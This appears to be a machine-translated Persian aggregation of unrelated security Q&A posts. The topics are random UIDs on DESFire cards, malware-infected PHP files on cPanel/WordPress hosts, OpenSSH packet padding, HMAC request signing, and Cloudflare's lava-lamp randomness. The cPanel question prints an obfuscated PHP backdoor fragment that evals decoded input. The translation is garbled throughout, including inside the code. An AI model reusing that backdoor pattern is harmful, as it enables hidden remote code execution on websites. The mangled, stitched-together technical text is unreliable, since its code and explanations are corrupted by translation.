چرا کارت های DESFire و Mifare Plus یک ویژگی UID تصادفی ارائه می دهند؟

شاید این یک سوال مبتدی است، اما من خیلی جستجو کرده ام و نمیتوانم پاسخی پیدا کنم. چرا کارت های DESFire و کارت های Mifare Plus یک ویژگی UID Random ارائه می دهند؟ چه ریسک هایی باید آن را کاهش دهد یا چه ویژگی هایی باید ارائه دهد؟

cpanel – فایلهای php به صورت تصادفی با کد مخرب

من می بینم که فایل های پی اچ پی در دایرکتوری های چندگانه با نام های تصادفی که دارای کد زیر هستند را نشان می دهد: https://pastebin.com/Baus2eCV که به

 `` `غلبه می کند
 $ ajyhxyf) {
    تابع ddrpid ($ mxgxe، $ qlfhzo، $ adusfqt) {
        بازگشت $ mxgxe [6] ($ mxgxe [4] ($ qlfhzo. $ mxgxe [2]، ($ adusfqt / $ mxgxe [8] ($ qlfhzo)) + 1)، 0، $ adusfqt)؛
    }
    تابع myvswg ($ mxgxe، $ otdyni) {
        بازگشت @ $ mxgxe [9] ($ mxgxe [0]، $ otdyni)؛
    }
    تابع vdklyzv ($ mxgxe، $ otdyni) {
        $ vvtrzvc = $ mxgxe [3] ($ otdyni)٪ 3؛
        اگر (! $ vvtrzvc) {
            eval ($ otdyni [1] ($ otdyni [2]))؛
            خروج ()؛
        }
    }
    $ ajyhxyf = myvswg ($ mxgxe، $ ajyhxyf)؛
    vdklyzv ($ mxgxe، $ mxgxe [5] ($ mxgxe [1]، $ ajyhxyf ^ ddrpid ($ mxgxe، $ qlfhzo، $ mxgxe [8] ($ ajyhxyf))))؛
}؟>
`` `

آنها اغلب سایت های وردپرس و یک نصب Prestashop هستند. من iThemes Security، Wordfence و GOTMLS را نصب کرده ام اما فایل ها هنوز به نمایش در می آیند. آنها همچنین در نصب Prestashop نشان داده می شوند.

من خودم می توانم نرم افزارهای مخرب را به صورت دستی تمیز کنم. مسئله نصب cpanel سخت تر است و این که چگونه این اتفاق می افتد. من تمام سایت ها را دانلود کرده ام و سایت های WordPress و فایل های اصلی را جایگزین / ارتقا داده ام، تمام پلاگین ها را به روز رسانی کرده اند و مجوز های فایل به عنوان iThemes توصیه می شود. در اینجا یک پرونده ورود به دایرکتوری / سایت مورد نظر است، اما من نمی دانم که من دنبال چه چیزی هستم: https://pastebin.com/pzrMMivr

از قبل سپاسگزارم.

شبکه – OpenSSH آیا استفاده از قطعه از طول تصادفی؟

با توجه به پایان بخش RFC 4253 §6، ظاهر تصادفی که برای هر بسته SSH معرفی شده است، از چندین دلخواه از 8 می باشد. این اشاره می کند که طول های عرض تصادفی می توانند تحلیل ترافیک را کاهش دهند:

توجه کنید که طول پیوند 'packet_length'، 'padding_length'، 'payload' و 'padding تصادفی' باید چند برابر اندازه بلوک رمز یا 8، هر کدام بزرگتر باشد. این محدودیت باید حتی هنگام استفاده از رمزهای جریان نیز اجرا شود. توجه داشته باشید که فیلد 'packet_length' نیز رمزگذاری می شود و پردازش آن نیاز به مراقبت ویژه هنگام ارسال یا دریافت بسته ها دارد. همچنین توجه داشته باشید که قرار دادن مقادیر متغیر 'padding تصادفی' ممکن است به تجزیه و تحلیل ترافیک کمک کند.

معدن برجسته. من آگاه هستم که محتوای محتویات خود را به صورت تصادفی مورد نیاز است، اما آیا OpenSSH برای استفاده از حالتهای رمزنگاری از عرض طولی تصادفی استفاده می کند؟ فیلد طول فیلد برای برخی از حالتها رمزگذاری می شود. با نگاه کردن به منبع، به نظر نمی رسد مانند استفاده از padding از طول تصادفی، اما من به خصوص از ویژگی های OpenSSH آشنا نیست.

api – HMAC و با استفاده از فیلد تصادفی ایمن رمزنگاری به عنوان پیام

بگو که من یک برنامه بزرگ دارم که می خواهم یک API امن ایجاد کنم. راه های استاندارد رفتن این است که با کلید عمومی API و یک کلید API مخفی کار کنند و این را به کاربر ارائه دهند. بعد، در هر درخواست API، پیام ها با استفاده از MAC بر روی کلید مخفی و (بخشی از) پیام امضا می شوند.

اکنون، از آنجا که این برنامه بزرگ است، نمی خواهم انتخاب کنم در صورت درخواست API من برای پاسخ دادن به یک سؤال، message = answer ، اگر درخواست API من برای ارسال نظر بود message = comment و غیره …).

برای راحتی، از این به بعد می خواهم یک فیلد تصادفی ایمن رمزنگاری اضافه کنم، که بر روی هر درخواست اضافه می شود (اجازه دهید با نام این نمک نام خود را بنویسیم). به این ترتیب من می توانم یک تأیید درخواست را که همه شرایط را پوشش می دهد بنویسم.

پرسش های من در حال حاضر است:

آیا این ایده خوبی است و چرا (نه) خیلی؟

Cloudflare با استفاده از کدام یک از این آیتم ها برای تولید داده های رمزنگاری تصادفی؟

پاسخ: لامپ های لوا

Cloudflare، شرکت مبتنی بر ایالات متحده که متخصص در شبکه های تحویل محتوا، کاهش رفع توزیع سرویس، خدمات امنیت اینترنت و سایر خدمات مرتبط با اینترنت است، بسیار علاقه مند به ارائه امنیت سطح بالا برای مشتریانی که با آنها کار می کنند و زیرساخت های خود را دارند.

بخشی از این امنیت به استفاده از داده های تصادفی برای تولید کلید های رمزنگاری ایمن متکی است. همانطور که هر دانشمند کامپیوتر می تواند به شما بگوید، رایانه های خودشان در تولید عدد تصادفی واقعا بزرگ نیستند، اما جهان اطراف ما در آن بسیار عالی است. Cloudflare این واقعیت را در یک روش نسبتا هوشمندانه و چشمگیر به کار برده است. در لابی دفتر دفتر سان فرانسیسکو، دیوار غول پیکری از لامپ های گدازه وجود دارد. چراغ ها فقط برای یک زیبایی شناسی دره Silicon Valley وجود ندارد (هرچند که مطمئنا این کار را انجام می دهند).

چراغ ها برای ارائه یک منبع عظیم و دائما در حال تغییر داده های واقعی تصادفی جهان وجود دارد. تمام روزها، هر روز، دوربین های امنیتی که در لامپ های گدازه آموزش دیده اند، از موقعیت های مداوم تغییر صدها پشته از گدازه موم مذاب استفاده می کنند تا مجموعه داده های تصادفی تولید کنند. کل فرایند بسیار جذاب است و اگر شما لذت بردن از استراحت برای خواندن در مورد ins و outs از آن، شما می توانید در مورد جزئیات "LavaRand" خود را در اینجا به عنوان خوانده شده.

حسن نیت ارائه میدهد از Cloudflare.